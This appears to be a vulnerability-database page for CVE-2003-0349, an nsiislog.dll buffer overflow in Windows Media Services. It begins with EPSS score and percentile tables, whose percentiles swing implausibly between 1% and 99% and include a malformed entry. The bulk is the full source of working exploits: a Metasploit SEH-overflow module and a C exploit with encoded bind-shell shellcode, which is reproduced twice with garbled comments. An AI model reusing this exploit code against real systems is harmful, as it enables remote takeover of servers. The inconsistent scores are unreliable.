CVE-2003-0349 : Detail

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

Date	EPSS V0	EPSS V1	EPSS V2 (> 2022-02-04)	EPSS V3 (> 2025-03-07)	EPSS V4 (> 2025-03-17)
2022-02-06	–	–	85.53%	–	–
2023-03-12	–	–	–	96.44%	–
2023-07-16	–	–	–	96.19%	–
2023-12-10	–	–	–	96.47%	–
2024-02-11	–	–	–	96.47%	–
2024-06-02	–	–	–	96.16%	–
2024-11-10	–	–	–	92.89%	–
2024-12-22	–	–	–	92.67%	–
2025-01-19	–	–	–	92.67%	–
2025-03-18	–	–	–	–	88.21%
2025-03-18	–	–	–	–	88.21,%

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Date	Percentile
2022-02-06	1%
2023-03-12	99%
2023-07-16	99%
2023-12-10	99%
2024-02-11	1%
2024-06-02	1%
2024-11-10	99%
2024-12-22	99%
2025-01-19	99%
2025-03-18	99%
2025-03-18	99%

## # $Id: ms03_022_nsiislog_post.rb 9929 2010-07-25 21:37:54Z jduck $ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::BruteTargets include Msf::Exploit::Remote::Seh def initialize(info = {}) super(update_info(info, 'Name' => 'Microsoft IIS ISAPI nsiislog.dll ISAPI POST Overflow', 'Description' => %q{ This exploits a buffer overflow found in the nsiislog.dll ISAPI filter that comes with Windows Media Server. This module will also work against the 'patched' MS03-019 version. This vulnerability was addressed by MS03-022. }, 'Author' => [ 'hdm' ], 'License' => MSF_LICENSE, 'Version' => '$Revision: 9929 $', 'References' => [ [ 'CVE', '2003-0349'], [ 'OSVDB', '4535'], [ 'BID', '8035'], [ 'MSB', 'MS03-022'], [ 'URL', 'http://archives.neohapsis.com/archives/vulnwatch/2003-q2/0120.html'], ], 'Privileged' => false, 'Payload' => { 'Space' => 1024, 'BadChars' => "\x00\x2b\x26\x3d\x25\x0a\x0d\x20", 'StackAdjustment' => -3500, }, 'Platform' => 'win', 'Targets' => [ # SEH offsets by version (Windows 2000) # 4.1.0.3917 = 9992 # 4.1.0.3920 = 9992 # 4.1.0.3927 = 9992 # 4.1.0.3931 = 14092 ['Brute Force', { }], ['Windows 2000 -MS03-019', { 'Rets' => [ 9988, 0x40f01333 ] }], ['Windows 2000 +MS03-019', { 'Rets' => [ 14088, 0x40f01353 ] }], ['Windows XP -MS03-019', { 'Rets' => [ 9992, 0x40f011e0 ] }], ], 'DisclosureDate' => 'Jun 25 2003', 'DefaultTarget' => 0)) register_options( [ OptString.new('URL', [ true, "The path to nsiislog.dll", "/scripts/nsiislog.dll" ]), ], self.class) end def check res = send_request_raw({ 'uri' => datastore['URL'] }, -1) if (res and res.body =~ /NetShow ISAPI/) return Exploit::CheckCode::Detected end return Exploit::CheckCode::Safe end def exploit_target(target) # Create a buffer greater than max SEH offset (16384) pst = rand_text_alphanumeric(256) * 64 # Create SEH frame and insert into buffer seh = generate_seh_payload(target['Rets'][1]) pst[target['Rets'][0], seh.length] = seh # Send it to the server print_status("Sending request...") res = send_request_cgi({ 'uri' => datastore['URL'], 'method' => 'POST', 'user-agent' => 'NSPlayer/2.0', 'content-type' => 'application/x-www-form-urlencoded', 'data' => pst }, 5) select(nil,nil,nil,1) handler disconnect end end

// Windows Media Services Remote Command Execution #2 // v. 1.0 beta // (c) firew0rker //tN [The N0b0D1eS] #include <stdio.h> #include <string.h> #include <stdlib.h> #ifdef WIN32 #include <winsock.h> #pragma comment(lib, "wsock32") #else #include <sys/socket.h> #include <sys/types.h> #include <netinet/in.h> #include <arpa/inet.h> #include <netdb.h> #include <unistd.h> #define SOCKET int #define DWORD uint32_t #define ULONG unsigned long #define INVALID_SOCKET -1 #define SOCKET_ERROR -1 #define closesocket close #endif char shellcode[]= //"\x90\x90\x90\x90\x90\x90\x90\xCC" //¤«ï ®â« ¤ª¨ "\xeb\x02\xeb\x05\xe8\xf9\xff\xff" "\xff\x5b\x81\xeb\x4d\x43\x22\x11" "\x8b\xc3\x05\x66\x43\x22\x11\x66" "\xb9\x15\x03\x80\x30\xfb\x40\x67" "\xe2\xf9\x33\xa3\xf9\xfb\x72\x66" "\x53\x06\x04\x04\x76\x66\x37\x06" "\x04\x04\xa8\x40\xf6\xbd\xd9\xea" "\xf8\x66\x53\x06\x04\x04\xa8\x93" "\xfb\xfb\x04\x04\x13\x91\xfa\xfb" "\xfb\x43\xcd\xbd\xd9\xea\xf8\x7e" "\x53\x06\x04\x04\xab\x04\x6e\x37" "\x06\x04\x04\xf0\x3b\xf4\x7f\xbe" "\xfa\xfb\xfb\x76\x66\x3b\x06\x04" "\x04\xa8\x40\xba\xbd\xd9\xea\xf8" "\x66\x53\x06\x04\x04\xa8\xab\x13" "\xcc\xfa\xfb\xfb\x76\x7e\x8f\x05" "\x04\x04\xab\x93\xfa\xfa\xfb\xfb" "\x04\x6e\x4b\x06\x04\x04\xc8\x20" "\xa8\xa8\xa8\x91\xfd\x91\xfa\x91" "\xf9\x04\x6e\x3b\x06\x04\x04\x72" "\x7e\xa7\x05\x04\x04\x9d\x3c\x7e" "\x9f\x05\x04\x04\xf9\xfb\x9d\x3c" "\x7e\x9d\x05\x04\x04\x73\xfb\x3c" "\x7e\x93\x05\x04\x04\xfb\xfb\xfb" "\xfb\x76\x66\x9f\x05\x04\x04\x91" "\xeb\xa8\x04\x4e\xa7\x05\x04\x04" "\x04\x6e\x47\x06\x04\x04\xf0\x3b" "\x8f\xe8\x76\x6e\x9c\x05\x04\x04" "\x05\xf9\x7b\xc1\xfb\xf4\x7f\x46" "\xfb\xfb\xfb\x10\x2f\x91\xfa\x04" "\x4e\xa7\x05\x04\x04\x04\x6e\x43" "\x06\x04\x04\xf0\x3b\xf4\x7e\x5e" "\xfb\xfb\xfb\x3c\x7e\x9b\x05\x04" "\x04\xeb\xfb\xfb\xfb\x76\x7e\x9b" "\x05\x04\x04\xab\x76\x7e\x9f\x05" "\x04\x04\xab\x04\x4e\xa7\x05\x04" "\x04\x04\x6e\x4f\x06\x04\x04\x72" "\x7e\xa3\x05\x04\x04\x07\x76\x46" "\xf3\x05\x04\x04\xc8\x3b\x42\xbf" "\xfb\xfb\xfb\x08\x51\x3c\x7e\xcf" "\x05\x04\x04\xfb\xfa\xfb\xfb\x70" "\x7e\xa3\x05\x04\x04\x72\x7e\xbf" "\x05\x04\x04\x72\x7e\xb3\x05\x04" "\x04\x72\x7e\xbb\x05\x04\x04\x3c" "\x7e\xf3\x05\x04\x04\xbf\xfb\xfb" "\xfb\xc8\x20\x76\x7e\x03\x06\x04" "\x04\xab\x76\x7e\xf3\x05\x04\x04" "\xab\xa8\xa8\x93\xfb\xfb\xfb\xf3" "\x91\xfa\xa8\xa8\x43\x8c\xbd\xd9" "\xea\xf8\x7e\x53\x06\x04\x04\xab" "\xa8\x04\x6e\x3f\x06\x04\x04\x04" "\x4e\xa3\x05\x04\x04\x04\x6e\x57" "\x06\x04\x04\x12\xa0\x04\x04\x04" "\x04\x6e\x33\x06\x04\x04\x13\x76" "\xfa\xfb\xfb\x33\xef\xfb\xfb\xac" "\xad\x13\xfb\xfb\xfb\xfb\x7a\xd7" "\xdf\xf9\xbe\xd9\xea\x43\x0e\xbe" "\xd9\xea\xf8\xff\xdf\x78\x3f\xff" "\xab\x9f\x9c\x04\xcd\xfb\xfb\x72" "\x9e\x03\x13\xfb\xfb\xfb\xfb\x7a" "\xd7\xdf\xd8\xbe\xd9\xea\x43\xac" "\xbe\xd9\xea\xf8\xff\xdf\x78\x3f" "\xff\x72\xbe\x07\x9f\x9c\x72\xdd" "\xfb\xfb\x70\x86\xf3\x9d\x7a\xc4" "\xb6\xa1\x8e\xf4\x70\x0c\xf8\x8d" "\xc7\x7a\xc5\xab\xbe\xfb\xfb\x8e" "\xf9\x10\xf3\x7a\x14\xfb\xfb\xfa" "\xfb\x10\x19\x72\x86\x0b\x72\x8e" "\x17\x70\x86\xf7\x42\x6d\xfb\xfb" "\xfb\xc9\x3b\x09\x55\x72\x86\x0f" "\x70\x34\xd0\xb6\xf7\x70\xad\x83" "\xf8\xae\x0b\x70\xa1\xdb\xf8\xa6" "\x0b\xc8\x3b\x70\xc0\xf8\x86\x0b" "\x70\x8e\xf7\xaa\x08\x5d\x8e\xfe" "\x78\x3f\xff\x10\xf1\xa2\x78\x38" "\xff\xbb\xc0\xb9\xe3\x8e\x1f\xc0" "\xb9\xe3\x8e\xf9\x10\xb8\x70\x89" "\xdf\xf8\x8e\x0b\x2a\x1b\xf8\x3d" "\xf4\x4c\xfb\x70\x81\xe7\x3a\x1b" "\xf9\xf8\xbe\x0b\xf8\x3c\x70\xfb" "\xf8\xbe\x0b\x70\xb6\x0f\x72\xb6" "\xf7\x70\xa6\xeb\x72\xf8\x78\x96" "\xeb\xff\x70\x8e\x17\x7b\xc2\xfb" "\x8e\x7c\x9f\x9c\x74\xfd\xfb\xfb" "\x78\x3f\xff\xa5\xa4\x32\x39\xf7" "\xfb\x70\x86\x0b\x12\x99\x04\x04" "\x04\x33\xfb\xfb\xfb\x70\xbe\xeb" "\x7a\x53\x67\xfb\xfb\xfb\xfb\xfb" "\xfa\xfb\x43\xfb\xfb\xfb\xfb\x32" "\x38\xb7\x94\x9a\x9f\xb7\x92\x99" "\x89\x9a\x89\x82\xba\xfb\xbe\x83" "\x92\x8f\xab\x89\x94\x98\x9e\x88" "\x88\xfb\xb8\x89\x9e\x9a\x8f\x9e" "\xab\x89\x94\x98\x9e\x88\x88\xba" "\xfb\xfb\xac\xa8\xc9\xa4\xc8\xc9" "\xd5\xbf\xb7\xb7\xfb\xac\xa8\xba" "\xa8\x94\x98\x90\x9e\x8f\xba\xfb" "\x99\x92\x95\x9f\xfb\x97\x92\x88" "\x8f\x9e\x95\xfb\x9a\x98\x98\x9e" "\x8b\x8f\xfb\xac\xa8\xba\xa8\x8f" "\x9a\x89\x8f\x8e\x8b\xfb\x98\x97" "\x94\x88\x9e\x88\x94\x98\x90\x9e" "\x8f\xfb\xfb\x98\x96\x9f\xfb\xe9" "\xc4\xfc\xff\xff\x74\xf9\x75\xf7"; const DWORD default_EIP_pos = 9992; //¯®«®¦¥­¨¥ EIP ¢ ¡ãä¥à¥ (sploit) const DWORD default_EBX_points_to = 9988; //㪠§ â¥«ì ¢ EBX ®â­®á¨â¥«ì­® sploit //const DWORD default_EIP_value = 0x77F8441B; //¯® í⮬㠤à. ¤.¡. JMP EDX, ¢ ¤ ­­®¬ á«ãç ¥ íâ® ¢ ntdll.dll const DWORD default_EIP_value = 0x40F01333; //const default_EDX_points_to = 0x1000; //íâ® ­¥ ¯à¨£®¤¨«®áì char *nsiislog_default = "/scripts/nsiislog.dll"; char sploit[default_EIP_pos+4+sizeof(shellcode)+1]; char sploitbuf[sizeof(sploit)*2]; void usage(char* argv[]) { printf("Dicklamer (: " "We are not responsible for the illegal use of this software.\n" "Description: Binds shell to port 34816 (or higher if port busy).\n" "Usage: " "%s target [-p target_port] [-r /renamed_scripts/renamed_nsiislog.dll]\n" "Supported target(s):\n" "Windows version\t\t\t\tnsiislog.dll version\n" "------------------------------------------------------------\n" "2000 [5.00.2195] server rus.\t\t4.1.0.3917\n", argv[0]); exit(0); } int main(int argc, char* argv[]) { #ifdef WIN32 WSADATA wsaData; #endif int target_port = 80; char *nsiislog = nsiislog_default; int nArgIndex; if (argc<2) usage(argv); nArgIndex = 1; while ((nArgIndex < argc)&&(strlen(argv[nArgIndex])>=2)&&(argv[nArgIndex][0]=='-')) { switch (argv[nArgIndex++][1]) { case 'p': case 'P': target_port = atoi(argv[nArgIndex++]); continue; case 'r': case 'R': nsiislog = argv[nArgIndex++]; continue; default: usage(argv); } } try { #ifdef WIN32 WSAStartup(0x0101, &wsaData); #endif SOCKET s = socket(AF_INET,SOCK_STREAM,0); if (s == INVALID_SOCKET) throw("No socket"); sockaddr_in addr; //Ž¯à¥¤¥«ï¥¬ ¤à¥á á¥à¢ ª ULONG iaddr = inet_addr(argv[1]); if (iaddr == INADDR_NONE) {//€¤à¥á - ¨¬ï á¥à¢ ª hostent *ph = gethostbyname(argv[1]); if (!ph) throw("Cant resolve hostname"); memcpy(&addr.sin_addr.s_addr,ph->h_addr_list[0],sizeof(in_addr)); } else {//€¤à¥á - IP memcpy(&addr.sin_addr.s_addr,&iaddr,4); }; addr.sin_family = AF_INET; addr.sin_port = htons(target_port); int sizeofaddr=sizeof(addr); char *req = "MX_STATS_LogLine: "; strcpy(sploit, req); memset(sploit+strlen(sploit), 0xCC, default_EIP_pos-strlen(req)); //memcpy(sploit+default_EDX_points_to, shellcode, sizeof(shellcode)-1/*ã¡à âì \0*/); memcpy(sploit+default_EBX_points_to-(sizeof(shellcode)-1)+4, shellcode, sizeof(shellcode)-1/*ã¡à âì \0*/); //¯à¨ ¯¥à¥å®¤¥ ­ EIP, EBX ¡ã¤¥â 㪠§ë¢ âì ­ ¯®á«¥¤­¨© DWORD ­ 襣® § ¯à®á , £¤¥ JZ/JNZ memcpy(sploit+default_EIP_pos, &default_EIP_value, sizeof default_EIP_value); /*strcpy(sploit+sizeof(sploit)-11,"BCDEFGHIJK");*/ sploit[sizeof(sploit)-1] = 0; if (connect(s,(struct sockaddr*)&addr,sizeof(struct sockaddr)) == SOCKET_ERROR) throw("Cant connect host"); sprintf(sploitbuf, "POST %s HTTP/1.0\r\n" "Accept: */*\r\n" "User-Agent: NSPlayer/4.1.0.3917\r\n" "Content-Type: text/plain\r\n" "Content-Length: %i\r\n" "Pragma: xClientGUID={89f451e0-a491-4346-ad78-4d55aac89045}\r\n" "\r\n%s\r\n", nsiislog,strlen(sploit),sploit); int snd=send(s,sploitbuf,strlen(sploitbuf),0); if (snd == strlen(sploitbuf)) printf("Target exploited.\n"); else throw("Cant send exploit"); closesocket(s); } catch (char *errmsg) { printf("%s\n",errmsg); return -1; } catch (int err_n) { printf("error %i\n",err_n); return err_n; } #ifdef WIN32 WSACleanup(); #endif return 0; } // milw0rm.com [2003-07-01]

// source: https://www.securityfocus.com/bid/8035/info Microsoft has reported a buffer overflow vulnerability in Windows Media Services. This is due to a problem with how the logging ISAPI extension handles incoming client requests. This could cause arbitrary code execution in IIS, which is exploitable through Media Services. // Windows Media Services Remote Command Execution #2 // v. 1.0 beta // (c) firew0rker //tN [The N0b0D1eS] #include <stdio.h> #include <string.h> #include <stdlib.h> #ifdef WIN32 #include <winsock.h> #pragma comment(lib, "wsock32") #else #include <sys/socket.h> #include <sys/types.h> #include <netinet/in.h> #include <arpa/inet.h> #include <netdb.h> #include <unistd.h> #define SOCKET int #define DWORD uint32_t #define ULONG unsigned long #define INVALID_SOCKET -1 #define SOCKET_ERROR -1 #define closesocket close #endif char shellcode[]= //"\x90\x90\x90\x90\x90\x90\x90\xCC" //¤«ï⤪¨ "\xeb\x02\xeb\x05\xe8\xf9\xff\xff" "\xff\x5b\x81\xeb\x4d\x43\x22\x11" "\x8b\xc3\x05\x66\x43\x22\x11\x66" "\xb9\x15\x03\x80\x30\xfb\x40\x67" "\xe2\xf9\x33\xa3\xf9\xfb\x72\x66" "\x53\x06\x04\x04\x76\x66\x37\x06" "\x04\x04\xa8\x40\xf6\xbd\xd9\xea" "\xf8\x66\x53\x06\x04\x04\xa8\x93" "\xfb\xfb\x04\x04\x13\x91\xfa\xfb" "\xfb\x43\xcd\xbd\xd9\xea\xf8\x7e" "\x53\x06\x04\x04\xab\x04\x6e\x37" "\x06\x04\x04\xf0\x3b\xf4\x7f\xbe" "\xfa\xfb\xfb\x76\x66\x3b\x06\x04" "\x04\xa8\x40\xba\xbd\xd9\xea\xf8" "\x66\x53\x06\x04\x04\xa8\xab\x13" "\xcc\xfa\xfb\xfb\x76\x7e\x8f\x05" "\x04\x04\xab\x93\xfa\xfa\xfb\xfb" "\x04\x6e\x4b\x06\x04\x04\xc8\x20" "\xa8\xa8\xa8\x91\xfd\x91\xfa\x91" "\xf9\x04\x6e\x3b\x06\x04\x04\x72" "\x7e\xa7\x05\x04\x04\x9d\x3c\x7e" "\x9f\x05\x04\x04\xf9\xfb\x9d\x3c" "\x7e\x9d\x05\x04\x04\x73\xfb\x3c" "\x7e\x93\x05\x04\x04\xfb\xfb\xfb" "\xfb\x76\x66\x9f\x05\x04\x04\x91" "\xeb\xa8\x04\x4e\xa7\x05\x04\x04" "\x04\x6e\x47\x06\x04\x04\xf0\x3b" "\x8f\xe8\x76\x6e\x9c\x05\x04\x04" "\x05\xf9\x7b\xc1\xfb\xf4\x7f\x46" "\xfb\xfb\xfb\x10\x2f\x91\xfa\x04" "\x4e\xa7\x05\x04\x04\x04\x6e\x43" "\x06\x04\x04\xf0\x3b\xf4\x7e\x5e" "\xfb\xfb\xfb\x3c\x7e\x9b\x05\x04" "\x04\xeb\xfb\xfb\xfb\x76\x7e\x9b" "\x05\x04\x04\xab\x76\x7e\x9f\x05" "\x04\x04\xab\x04\x4e\xa7\x05\x04" "\x04\x04\x6e\x4f\x06\x04\x04\x72" "\x7e\xa3\x05\x04\x04\x07\x76\x46" "\xf3\x05\x04\x04\xc8\x3b\x42\xbf" "\xfb\xfb\xfb\x08\x51\x3c\x7e\xcf" "\x05\x04\x04\xfb\xfa\xfb\xfb\x70" "\x7e\xa3\x05\x04\x04\x72\x7e\xbf" "\x05\x04\x04\x72\x7e\xb3\x05\x04" "\x04\x72\x7e\xbb\x05\x04\x04\x3c" "\x7e\xf3\x05\x04\x04\xbf\xfb\xfb" "\xfb\xc8\x20\x76\x7e\x03\x06\x04" "\x04\xab\x76\x7e\xf3\x05\x04\x04" "\xab\xa8\xa8\x93\xfb\xfb\xfb\xf3" "\x91\xfa\xa8\xa8\x43\x8c\xbd\xd9" "\xea\xf8\x7e\x53\x06\x04\x04\xab" "\xa8\x04\x6e\x3f\x06\x04\x04\x04" "\x4e\xa3\x05\x04\x04\x04\x6e\x57" "\x06\x04\x04\x12\xa0\x04\x04\x04" "\x04\x6e\x33\x06\x04\x04\x13\x76" "\xfa\xfb\xfb\x33\xef\xfb\xfb\xac" "\xad\x13\xfb\xfb\xfb\xfb\x7a\xd7" "\xdf\xf9\xbe\xd9\xea\x43\x0e\xbe" "\xd9\xea\xf8\xff\xdf\x78\x3f\xff" "\xab\x9f\x9c\x04\xcd\xfb\xfb\x72" "\x9e\x03\x13\xfb\xfb\xfb\xfb\x7a" "\xd7\xdf\xd8\xbe\xd9\xea\x43\xac" "\xbe\xd9\xea\xf8\xff\xdf\x78\x3f" "\xff\x72\xbe\x07\x9f\x9c\x72\xdd" "\xfb\xfb\x70\x86\xf3\x9d\x7a\xc4" "\xb6\xa1\x8e\xf4\x70\x0c\xf8\x8d" "\xc7\x7a\xc5\xab\xbe\xfb\xfb\x8e" "\xf9\x10\xf3\x7a\x14\xfb\xfb\xfa" "\xfb\x10\x19\x72\x86\x0b\x72\x8e" "\x17\x70\x86\xf7\x42\x6d\xfb\xfb" "\xfb\xc9\x3b\x09\x55\x72\x86\x0f" "\x70\x34\xd0\xb6\xf7\x70\xad\x83" "\xf8\xae\x0b\x70\xa1\xdb\xf8\xa6" "\x0b\xc8\x3b\x70\xc0\xf8\x86\x0b" "\x70\x8e\xf7\xaa\x08\x5d\x8e\xfe" "\x78\x3f\xff\x10\xf1\xa2\x78\x38" "\xff\xbb\xc0\xb9\xe3\x8e\x1f\xc0" "\xb9\xe3\x8e\xf9\x10\xb8\x70\x89" "\xdf\xf8\x8e\x0b\x2a\x1b\xf8\x3d" "\xf4\x4c\xfb\x70\x81\xe7\x3a\x1b" "\xf9\xf8\xbe\x0b\xf8\x3c\x70\xfb" "\xf8\xbe\x0b\x70\xb6\x0f\x72\xb6" "\xf7\x70\xa6\xeb\x72\xf8\x78\x96" "\xeb\xff\x70\x8e\x17\x7b\xc2\xfb" "\x8e\x7c\x9f\x9c\x74\xfd\xfb\xfb" "\x78\x3f\xff\xa5\xa4\x32\x39\xf7" "\xfb\x70\x86\x0b\x12\x99\x04\x04" "\x04\x33\xfb\xfb\xfb\x70\xbe\xeb" "\x7a\x53\x67\xfb\xfb\xfb\xfb\xfb" "\xfa\xfb\x43\xfb\xfb\xfb\xfb\x32" "\x38\xb7\x94\x9a\x9f\xb7\x92\x99" "\x89\x9a\x89\x82\xba\xfb\xbe\x83" "\x92\x8f\xab\x89\x94\x98\x9e\x88" "\x88\xfb\xb8\x89\x9e\x9a\x8f\x9e" "\xab\x89\x94\x98\x9e\x88\x88\xba" "\xfb\xfb\xac\xa8\xc9\xa4\xc8\xc9" "\xd5\xbf\xb7\xb7\xfb\xac\xa8\xba" "\xa8\x94\x98\x90\x9e\x8f\xba\xfb" "\x99\x92\x95\x9f\xfb\x97\x92\x88" "\x8f\x9e\x95\xfb\x9a\x98\x98\x9e" "\x8b\x8f\xfb\xac\xa8\xba\xa8\x8f" "\x9a\x89\x8f\x8e\x8b\xfb\x98\x97" "\x94\x88\x9e\x88\x94\x98\x90\x9e" "\x8f\xfb\xfb\x98\x96\x9f\xfb\xe9" "\xc4\xfc\xff\xff\x74\xf9\x75\xf7"; const DWORD default_EIP_pos = 9992; //¯®«®¦¥­¨¥ EIP ¢ ¡ãà(sploit) const DWORD default_EBX_points_to = 9988; //㧠⥫ì EBX ®⭮ᥫ쭮 sploit //const DWORD default_EIP_value = 0x77F8441B; //¯® í¬ã¤à¤.¡. JMP EDX, ¢ ¤ ­­®¬ áç í ¢ ntdll.dll const DWORD default_EIP_value = 0x40F01333; //const default_EDX_points_to = 0x1000; //í ­¥ ¯ਣ®¤¨«®á char *nsiislog_default = "/scripts/nsiislog.dll"; char sploit[default_EIP_pos+4+sizeof(shellcode)+1]; char sploitbuf[sizeof(sploit)*2]; void usage(char* argv[]) { printf("Dicklamer (: " "We are not responsible for the illegal use of this software.\n" "Description: Binds shell to port 34816 (or higher if port busy).\n" "Usage: " "%s target [-p target_port] [-r /renamed_scripts/renamed_nsiislog.dll]\n" "Supported target(s):\n" "Windows version\t\t\t\tnsiislog.dll version\n" "------------------------------------------------------------\n" "2000 [5.00.2195] server rus.\t\t4.1.0.3917\n", argv[0]); exit(0); } int main(int argc, char* argv[]) { #ifdef WIN32 WSADATA wsaData; #endif int target_port = 80; char *nsiislog = nsiislog_default; int nArgIndex; if (argc<2) usage(argv); nArgIndex = 1; while ((nArgIndex < argc)&&(strlen(argv[nArgIndex])>=2)&&(argv[nArgIndex][0]=='-')) { switch (argv[nArgIndex++][1]) { case 'p': case 'P': target_port = atoi(argv[nArgIndex++]); continue; case 'r': case 'R': nsiislog = argv[nArgIndex++]; continue; default: usage(argv); } } try { #ifdef WIN32 WSAStartup(0x0101, &wsaData); #endif SOCKET s = socket(AF_INET,SOCK_STREAM,0); if (s == INVALID_SOCKET) throw("No socket"); sockaddr_in addr; //.¯।¥«塞 ¤à ᢠª ULONG iaddr = inet_addr(argv[1]); if (iaddr == INADDR_NONE) {//.¤à - ¨¬ï¥àª hostent *ph = gethostbyname(argv[1]); if (!ph) throw("Cant resolve hostname"); memcpy(&addr.sin_addr.s_addr,ph->h_addr_list[0],sizeof(in_addr)); } else {//.¤à - IP memcpy(&addr.sin_addr.s_addr,&iaddr,4); }; addr.sin_family = AF_INET; addr.sin_port = htons(target_port); int sizeofaddr=sizeof(addr); char *req = "MX_STATS_LogLine: "; strcpy(sploit, req); memset(sploit+strlen(sploit), 0xCC, default_EIP_pos-strlen(req)); //memcpy(sploit+default_EDX_points_to, shellcode, sizeof(shellcode)-1/*ã â\0*/); memcpy(sploit+default_EBX_points_to-(sizeof(shellcode)-1)+4, shellcode, sizeof(shellcode)-1/*ã â\0*/); //¯à¯¥à®¤¥ ­ EIP, EBX ¡㤥⪠§ëâ­ ¯®᫥¤­¨© DWORD ­ 襣® § ¯à , £¤¥ JZ/JNZ memcpy(sploit+default_EIP_pos, &default_EIP_value, sizeof default_EIP_value); /*strcpy(sploit+sizeof(sploit)-11,"BCDEFGHIJK");*/ sploit[sizeof(sploit)-1] = 0; if (connect(s,(struct sockaddr*)&addr,sizeof(struct sockaddr)) == SOCKET_ERROR) throw("Cant connect host"); sprintf(sploitbuf, "POST %s HTTP/1.0\r\n" "Accept: */*\r\n" "User-Agent: NSPlayer/4.1.0.3917\r\n" "Content-Type: text/plain\r\n" "Content-Length: %i\r\n" "Pragma: xClientGUID={89f451e0-a491-4346-ad78-4d55aac89045}\r\n" "\r\n%s\r\n", nsiislog,strlen(sploit),sploit); int snd=send(s,sploitbuf,strlen(sploitbuf),0); if (snd == strlen(sploitbuf)) printf("Target exploited.\n"); else throw("Cant send exploit"); closesocket(s); } catch (char *errmsg) { printf("%s\n",errmsg); return -1; } catch (int err_n) { printf("error %i\n",err_n); return err_n; } #ifdef WIN32 WSACleanup(); #endif return 0; }